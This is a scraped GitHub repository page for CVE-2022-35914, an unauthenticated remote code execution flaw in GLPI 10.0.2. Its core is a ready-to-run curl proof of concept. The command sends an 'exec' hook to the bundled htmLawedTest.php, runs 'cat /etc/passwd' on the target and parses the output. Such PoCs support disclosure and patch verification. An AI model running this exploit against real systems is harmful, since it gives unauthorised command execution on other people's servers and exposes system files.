Skip to content

0xGabe/CVE-2022-35914

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

CVE-2022-35914

Unauthenticated RCE in GLPI 10.0.2

PoC

curl -s -d 'sid=foo&hhook=exec&text=cat /etc/passwd' -b 'sid=foo' http://{{HOST}}/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\&nbsp; \[[0-9]+\] =\&gt;'| sed -E 's/\&nbsp; \[[0-9]+\] =\&gt; (.*)<br \/>/\1/'

About

Unauthenticated RCE in GLPI 10.0.2

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published